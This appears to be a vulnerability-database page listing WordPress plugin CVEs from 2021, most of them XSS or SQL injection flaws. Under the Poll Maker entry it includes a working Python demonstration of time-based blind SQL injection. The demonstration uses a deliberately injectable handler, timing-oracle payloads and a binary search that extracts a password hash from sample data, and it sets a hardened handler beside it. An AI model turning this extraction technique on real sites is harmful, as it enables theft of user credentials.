
Live Vulnerability Intelligence

Threat Database

Search CVEs, inspect descriptions, and open detail pages with AI-assisted technical context.

Total 443 | Critical 34 | High 82 | Medium 311
Showing 381-400 of 443 records
CVE-2021-24698 - Simple Download Monitor plugin before 3.9.6

The Simple Download Monitor WordPress plugin before 3.9.6 allows users with a role as low as Contributor to remove thumbnails from downloads they do not own, even if they cannot normally edit the download.

WordPress plugin | MEDIUM (CVSS 4.3) | Published 2021-11-08 | Entry updated 2024-11-21
CVE-2021-24647 - Registration Forms plugin before 3.1.7.6

The Registration Forms – User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.1.7.6 has a flaw in its social login implementation, allowing an unauthenticated attacker to log in as any user on the site by knowing only that user's ID or username.

WordPress plugin | HIGH (CVSS 8.1) | Published 2021-11-08 | Entry updated 2024-11-21
CVE-2021-24773 - WordPress Download Manager plugin before 3.2.16

The WordPress Download Manager WordPress plugin before 3.2.16 does not escape some of the Download settings when outputting them, allowing high privilege users to perform XSS attacks even when the unfiltered_html capability is disallowed.

WordPress plugin | MEDIUM (CVSS 4.8) | Published 2021-11-01 | Entry updated 2025-03-21
CVE-2021-24514 - Visual Form Builder plugin before 3.0.4

The Visual Form Builder WordPress plugin before 3.0.4 does not sanitise or escape its Form Name, allowing high privilege users such as admin to store a Cross-Site Scripting payload in it, even when the unfiltered_html capability is disallowed.

WordPress plugin | MEDIUM (CVSS 4.8) | Published 2021-10-25 | Entry updated 2024-11-21
CVE-2021-24381 - Ninja Forms Contact Form plugin before 3.5.8.2

The Ninja Forms Contact Form WordPress plugin before 3.5.8.2 does not sanitise and escape the custom class name of the form field created, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

WordPress plugin | MEDIUM (CVSS 4.8) | Published 2021-10-25 | Entry updated 2024-11-21
CVE-2021-24677 - Find My Blocks plugin before 3.4.0

The Find My Blocks WordPress plugin before 3.4.0 does not have authorisation checks in its REST API, which could allow unauthenticated users to enumerate private posts' titles.

WordPress plugin | MEDIUM (CVSS 5.3) | Published 2021-10-18 | Entry updated 2024-11-21
CVE-2021-24651 - Poll Maker plugin before 3.4.2

The Poll Maker WordPress plugin before 3.4.2 allows unauthenticated users to perform SQL injection via the ays_finish_poll AJAX action. While the query result is not disclosed in the response, a timing attack can be used to exfiltrate data such as password hashes.

WordPress plugin | HIGH (CVSS 7.5) | Published 2021-10-11 | Entry updated 2024-11-21
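Why an injection whose result is never shown in the response is still rated High: the attacker only needs a yes/no side channel, and query duration is one. The Python below is an added example written for this page, not the Poll Maker plugin's code. It models a handler that concatenates a hypothetical poll_id parameter into SQL and always answers "ok", then drives it through a timing oracle to recover a stored hash character by character. SQLite has no SLEEP(), so a recursive CTE that only runs when the probed condition is true stands in for MySQL's SLEEP()/BENCHMARK(). The table layout, the "admin" login and the hash value are constructed sample data.

```python
import sqlite3
import time

# Constructed sample data standing in for a WordPress database: one poll row and a
# users table with a password hash. The hash is an arbitrary made-up string.
SECRET_HASH = "$P$Bx9q7Lk2"
DB = sqlite3.connect(":memory:")
DB.executescript("""
CREATE TABLE polls (id INTEGER PRIMARY KEY, title TEXT);
INSERT INTO polls VALUES (1, 'demo poll');
CREATE TABLE users (id INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
""")
DB.execute("INSERT INTO users VALUES (1, 'admin', ?)", (SECRET_HASH,))
DB.commit()


def vulnerable_finish_poll(poll_id: str) -> str:
    """Hypothetical AJAX handler showing the bug class: the request parameter is
    concatenated into SQL, and the response is constant whatever the query did."""
    DB.execute(f"SELECT id FROM polls WHERE id = {poll_id}").fetchall()
    return "ok"


def hardened_finish_poll(poll_id: str) -> str:
    """Same endpoint with the parameter validated as an integer and bound as a value."""
    try:
        pid = int(poll_id)
    except ValueError:
        return "bad request"
    DB.execute("SELECT id FROM polls WHERE id = ?", (pid,)).fetchall()
    return "ok"


# SQLite has no SLEEP(); a recursive CTE that only runs when the condition is true
# burns measurable CPU time instead, the same side channel MySQL's SLEEP() gives.
HEAVY = ("(WITH RECURSIVE c(x) AS (SELECT 1 UNION ALL SELECT x+1 FROM c WHERE x<150000) "
         "SELECT count(*) FROM c)")


def payload(condition: str) -> str:
    """Injection string for the poll_id parameter: true condition -> slow query."""
    return f"0 OR (SELECT CASE WHEN ({condition}) THEN {HEAVY} ELSE 0 END)"


def timed(handler, condition: str, repeats: int = 2) -> float:
    """Fastest of a few runs; noise only ever adds time, so the minimum is the
    cleanest estimate of the query's real cost."""
    best = float("inf")
    for _ in range(repeats):
        t0 = time.perf_counter()
        handler(payload(condition))
        best = min(best, time.perf_counter() - t0)
    return best


def calibrate(handler):
    """Time a known-false and a known-true condition. Returns the decision
    threshold, or None when the endpoint shows no usable timing difference
    (which is what a parameterised handler looks like from outside)."""
    fast = timed(handler, "1=2", repeats=3)
    slow = timed(handler, "1=1", repeats=3)
    if slow < 4 * fast + 0.01:
        return None
    return (fast + slow) / 2


def extract_prefix(handler, length: int, login: str = "admin") -> str:
    """Recover the first `length` characters of the user's password hash one
    character at a time, by binary search over printable ASCII (7 probes/char)."""
    threshold = calibrate(handler)
    if threshold is None:
        return ""
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            cond = (f"(SELECT unicode(substr(user_pass,{pos},1)) FROM users "
                    f"WHERE user_login='{login}') > {mid}")
            if timed(handler, cond) > threshold:
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    print("vulnerable handler leaks:", extract_prefix(vulnerable_finish_poll, 4))
    print("hardened handler leaks:  ", repr(extract_prefix(hardened_finish_poll, 4)))
```

The calibration step is what real tooling does as well: measure a known-true and a known-false probe first, refuse to proceed if they are indistinguishable, and take the minimum of repeated runs because scheduling noise can only make a request slower, never faster. Against the hardened handler the int() cast rejects the payload outright and calibrate() returns None, so the same code extracts nothing.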
CVE-2021-24577 - Coming soon and Maintenance mode plugin before 3.5.3

The Coming soon and Maintenance mode WordPress plugin before 3.5.3 does not properly sanitise inputs submitted by authenticated users when adding or modifying coming soon or maintenance mode pages, leading to stored XSS.

WordPress plugin | MEDIUM (CVSS 5.4) | Published 2021-10-11 | Entry updated 2024-11-21
CVE-2021-24656 - Simple Social Media Share Buttons plugin before 3.2.4

The Simple Social Media Share Buttons WordPress plugin before 3.2.4 does not escape the Share Title setting before outputting it in frontend pages or posts (depending on the settings used), allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

WordPress plugin | MEDIUM (CVSS 4.8) | Published 2021-10-11 | Entry updated 2024-11-21
CVE-2021-24678 - CM Tooltip Glossary plugin before 3.9.21

The CM Tooltip Glossary WordPress plugin before 3.9.21 does not escape some glossary_tooltip shortcode attributes, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks.

WordPress plugin | MEDIUM (CVSS 5.4) | Published 2021-10-04 | Entry updated 2024-11-21
CVE-2021-24666 - Podlove Podcast Publisher plugin before 3.5.6

The Podlove Podcast Publisher WordPress plugin before 3.5.6 contains a 'Social & Donations' module (not activated by default) which registers the REST route '/services/contributor/(?P<id>[\d]+)' and takes 'id' and 'category' parameters as arguments. Both parameters can be used for SQL injection.

WordPress plugin | CRITICAL (CVSS 9.8) | Published 2021-09-27 | Entry updated 2024-11-21
CVE-2021-24671 - MX Time Zone Clocks plugin before 3.4.1

The MX Time Zone Clocks WordPress plugin before 3.4.1 does not escape the time_zone attribute of the mxmtzc_time_zone_clocks shortcode, allowing users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks.

WordPress plugin | MEDIUM (CVSS 5.4) | Published 2021-09-27 | Entry updated 2024-11-21
CVE-2021-24741 - Support Board plugin before 3.3.4

The Support Board WordPress plugin before 3.3.4 does not escape multiple POST parameters (such as status_code, department, user_id, conversation_id, conversation_status_code, and recipient_id) before using them in SQL statements, leading to SQL injections which are exploitable by unauthenticated users.

WordPress plugin | CRITICAL (CVSS 9.8) | Published 2021-09-20 | Entry updated 2024-11-21
CVE-2021-24636 - Print My Blog plugin before 3.4.2

The Print My Blog WordPress plugin before 3.4.2 does not enforce nonce (CSRF) checks, which allows attackers to make logged-in administrators deactivate the Print My Blog plugin and delete all of its saved data by tricking them into opening a malicious link.

WordPress plugin | HIGH (CVSS 8.1) | Published 2021-09-20 | Entry updated 2024-11-21
CVE-2021-24637 - Google Fonts Typography plugin before 3.0.3

The Google Fonts Typography WordPress plugin before 3.0.3 does not escape and sanitise some of its block settings, allowing users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks via the blockType (combined with content), align, color, variant and fontID arguments of a Gutenberg block.

WordPress plugin | MEDIUM (CVSS 5.4) | Published 2021-09-20 | Entry updated 2024-11-21
CVE-2021-24511 - Product Feed on WooCommerce plugin before 3.3.1.0

The fetch_product_ajax functionality in the Product Feed on WooCommerce WordPress plugin before 3.3.1.0 uses a `product_id` POST parameter which is not properly sanitised, escaped or validated before being inserted into a SQL statement, leading to SQL injection.

WordPress plugin | HIGH (CVSS 7.2) | Published 2021-09-20 | Entry updated 2024-11-21
CVE-2021-24609 - WP Mapa Politico Espana plugin before 3.7.0

The WP Mapa Politico Espana WordPress plugin before 3.7.0 does not sanitise or escape some of its settings before outputting them in attributes, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

WordPress plugin | MEDIUM (CVSS 4.8) | Published 2021-09-20 | Entry updated 2024-11-21
CVE-2021-24588 - SMS Alert Order Notifications plugin before 3.4.7

The SMS Alert Order Notifications WordPress plugin before 3.4.7 is affected by a cross-site scripting (XSS) vulnerability in the plugin's settings page.

WordPress plugin | MEDIUM (CVSS 6.1) | Published 2021-09-06 | Entry updated 2024-11-21
CVE-2021-24579 - Bold Page Builder plugin before 3.1.6

The bt_bb_get_grid AJAX action of the Bold Page Builder WordPress plugin before 3.1.6 passes user input into the unserialize() function without any validation or sanitisation, which could lead to PHP Object Injection. Even though the plugin itself did not contain a suitable gadget to fully exploit the issue, other plugins installed on the blog could supply one and allow the issue to be exploited for RCE in some cases.

WordPress plugin | HIGH (CVSS 8.8) | Published 2021-08-30 | Entry updated 2024-11-21
CVE-2021-24658 - Erident Custom Login and Dashboard plugin before 3.5.9

The Erident Custom Login and Dashboard WordPress plugin before 3.5.9 did not properly sanitise its settings, allowing high privilege users to store XSS payloads in them, even when the unfiltered_html capability is disallowed.

WordPress plugin | MEDIUM (CVSS 4.8) | Published 2021-08-23 | Entry updated 2024-11-21